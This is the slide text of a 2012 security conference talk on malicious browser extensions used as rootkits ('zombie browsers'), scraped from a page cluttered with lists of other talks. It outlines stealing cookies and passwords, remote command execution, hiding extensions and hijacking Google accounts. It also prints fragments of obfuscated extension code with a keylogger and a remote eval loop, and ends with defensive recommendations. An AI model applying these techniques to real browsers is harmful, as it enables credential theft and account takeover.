CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comes
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidence
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
 
Forensics WS Consolidated
Forensics WS ConsolidatedForensics WS Consolidated
Forensics WS Consolidated
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - Introduction
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
 
Web-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting EnginesWeb-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting Engines
 
CheckPoint: Anatomy of an evolving bot
CheckPoint: Anatomy of an evolving botCheckPoint: Anatomy of an evolving bot
CheckPoint: Anatomy of an evolving bot
 
JavaOne 2014 Security Testing for Developers using OWASP ZAP
JavaOne 2014 Security Testing for Developers using OWASP ZAPJavaOne 2014 Security Testing for Developers using OWASP ZAP
JavaOne 2014 Security Testing for Developers using OWASP ZAP
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
DEEPSEC 2013: Malware Datamining And Attribution
DEEPSEC 2013: Malware Datamining And AttributionDEEPSEC 2013: Malware Datamining And Attribution
DEEPSEC 2013: Malware Datamining And Attribution
 

More from Zoltan Balazs

[ Hackersuli ] Privacy on the blockchain
[ Hackersuli ] Privacy on the blockchain[ Hackersuli ] Privacy on the blockchain
[ Hackersuli ] Privacy on the blockchain
Zoltan Balazs
 
MLSEC 2020
MLSEC 2020MLSEC 2020
MLSEC 2020
Zoltan Balazs
 
Web3 + scams = It's a match
Web3 + scams = It's a matchWeb3 + scams = It's a match
Web3 + scams = It's a match
Zoltan Balazs
 
How to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyHow to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ Disobey
Zoltan Balazs
 
Explain Ethereum smart contract hacking like i am a five
Explain Ethereum smart contract hacking like i am a fiveExplain Ethereum smart contract hacking like i am a five
Explain Ethereum smart contract hacking like i am a five
Zoltan Balazs
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-days
Zoltan Balazs
 
Test & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedTest & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automated
Zoltan Balazs
 

More from Zoltan Balazs (7)

[ Hackersuli ] Privacy on the blockchain
[ Hackersuli ] Privacy on the blockchain[ Hackersuli ] Privacy on the blockchain
[ Hackersuli ] Privacy on the blockchain
 
MLSEC 2020
MLSEC 2020MLSEC 2020
MLSEC 2020
 
Web3 + scams = It's a match
Web3 + scams = It's a matchWeb3 + scams = It's a match
Web3 + scams = It's a match
 
How to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyHow to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ Disobey
 
Explain Ethereum smart contract hacking like i am a five
Explain Ethereum smart contract hacking like i am a fiveExplain Ethereum smart contract hacking like i am a five
Explain Ethereum smart contract hacking like i am a five
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-days
 
Test & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedTest & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automated
 

Recently uploaded

Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
SOFTTECHHUB
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Aggregage
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
Adtran
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Nexer Digital
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..
UiPathCommunity
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Paige Cruz
 
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
Jen Stirrup
 

Recently uploaded (20)

Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
 
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
 

[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions

  • 1. Introduction Zoltán Balázs ITSEC consultant Deloitte Hungary Instructor @NetAkademia.hu OSCP, CISSP, C|HFI, CPTS, MCP http://www.slideshare.net/bz98 Cyberlympics finals 2012 - 2nd runner up Member of the gula.sh team
  • 3. I love Zombie movies
  • 5. Zombies + Hacking + LOLcats = I R ZOMBIE BROWSER
  • 6. Zombie browsers, spiced with rootkit extensions Hacker Halted 2012 • Legal disclaimer: • Every point of views and thoughts are mine. • The next presentation’s contents do not have any connection with my employers opinion, whether past, present or future. • What you will hear can be only used in test labs, and only for the good.
  • 7. About:presentation • History of malicious extensions (add-on, plug-in, extension, BHO) • Focus on Firefox, Chrome, Safari • Advantages – disadvantages • Browser extension rootkits • Live demo – home made extension
  • 8.
  • 9. History of malicious Firefox extensions • 90% of malicious extensions were created for Facebook spamming • 2004-2010: 5 • 2011: 5 • Jan 01, 2012 – Oct 23, 2012: 49* *Data from mozilla.org
  • 10. More examples on Facecrook Text ©f-secure
  • 11. My zombie extension • Command and Control • Stealing cookies, passwords • Uploading/downloading files (Firefox, Chrome NPAPI on todo list) • Binary execution (Firefox - Windows, Chrome NPAPI on todo list) • Geolocation
  • 12.
  • 13.
  • 14.
  • 15.
  • 16.
  • 18. Installing the extension Physical access Social Engineering Remote code execution – without user interaction
  • 19. Firefox rootkit 1 • Hook into other extension (even signed ones)
  • 20. Firefox rootkit 2 • visible = false
  • 21. Firefox rootkit 3 • seen in the wild
  • 22. Quick Quiz - for Hacker Pschorr
  • 23. Quick Quiz • Which company developed the first Netscape plugin? • *****
  • 24. Quick Quiz • Which company developed the first Netscape plugin? • A***e
  • 25. Quick Quiz • Which company developed the first Netscape plugin? • Adobe in 1995
  • 26. Risks of a Zombie Browser • Eats your brain while you are asleep
  • 27. Risks of a Zombie Browser
  • 28. Risks of a Zombie Browser • Firewall/proxy  • Local firewall  • Application whitelisting  • Web-filtering 
  • 29. Risks of a Zombie Browser • Cross-platform  • Cross-domain Universal XSS  • Every secret is available  • Password input method does not matter (password safe, virtual keyboard, etc.) • Before SSL (+JS obfuscation) • Malicious source codes are available  • Advantage against meterpreter  • exe/dll is not needed for persistence • Writing into registry is not needed
  • 30. Risks of a zombie browser • Low AV signature based detection rate  • Sample from January 2011. – October 2012. 0/40 • Extension vs. behavioral based detection 
  • 31. Risks of a zombie browser • Low AV signature based detection rate  • Sample from January 2011. – October 2012. 0/40 • Extension vs. behavioral based detection 
  • 32. Friendly message to AV developers: try harder… Code snippets from undetected malicious browser extension var _0x39fe=["x73x63x72x69x70x74","x63x72x65x61x74x65 x45x6Cx65x6Dx65x6E x74","x74x79x70x65","x74x65x78x74… _0xaed4=[_0x39fe[0],_0x39fe[1],_0x39fe[2],_0x39fe[3],_0x39fe[4],_0x39f e[5],_0x39fe[6],_0x39fe[7],_0x39fe[8],_0x39fe[9]]; keylogger_namespace.keylogger… for(var x in mothership){if (mothership[x].command == "eval") {eval(mothership[x].data);
  • 35. Disadvantages (for the Hacker) • Not a real rootkit • Browser limitations (eg. portscan) • Platform limitations (eg. Execute binary code only on Windows) • Runs in user space • Runs only when browser is open • Extensions are not yet supported in: • Chrome on Android/iOS • Safari on iOS
  • 36. Gmail demo • defeat 2 step verification • Why Google? • Hacking “the others” is boring • clear text cookies • missing 2 step verification • no concurrent session detection
  • 37. Gmail demo • defeat 2 step verification
  • 38. One to rule them all • Cookie + password stealing – defeat Google 2-step verification • Use password reset on other sites linked to G-mail (Paypal, etc.) • Install any app from Google Play to victim’s Android phone • Access Android WIFI passwords • Access to Google+, Docs, Picasa, Blogger, Contacts, Web history, Checkout, Apps, OpenID • Backdooring Google account • Adding application specific password • Stealing backup codes • G-mail mail forward rule
  • 41. ChromeOS DEMO Not today :-( no extension install from 3rd party site no Flash, no Java, no NPAPI
  • 42. ChromeOS DEMO Not today :-( no extension install from 3rd party site no Flash, no Java, no NPAPI
  • 43. Zombie Android DEMO • Android SQLite Journal Information Disclosure (CVE-2011-3901) • Android 2.3.7
  • 45. Browser extensions might be bad • @antivirus developers • Be reactive • The browser is the new OS • @browser developers (Mozilla) • Default deny installing extensions from 3rd-party sites • Chrome-level security • Require permissions • Extension components – separate privileges • @browser developers (Google) – keep on the good job • but disable NPAPI :)
  • 46. Browser extensions might be bad • @website developers • There is no prevention against password stealing • Cookie-stealing • Restrict session to IP (by default) • @users • Beware of malicious browser extensions • Use separated OS for e-banking and other sensitive stuff • Removing malicious extensions - create new clean profile in clean OS • @companies • Control which browsers users can use • Restrict extensions via GPO
  • 48.
  • 49. Should I release it on GitHub?
  • 50. References • Grégoire Gentil: Hack any website, 2003 • Christophe Devaux, Julien Lenoir: Browser rootkits, 2008 • Duarte Silva: Firefox FFSpy PoC, 2008 • Andreas Grech: Stealing login details with a Google Chrome extension, 2010 • Matt Johansen, Kyle Osborn: Hacking Google ChromeOS, 2011 • Nicolas Paglieri: Attacking Web Browsers, 2012
  • 51. Browser extensions might be bad, Mmmkay??? zbalazs@deloittece.com zbalazs4 hu.linkedin.com/in/zbalazs Code released(?) under GPL http://github.com/Z6543/ ZombieBrowserPack Greetz to @hekkcamp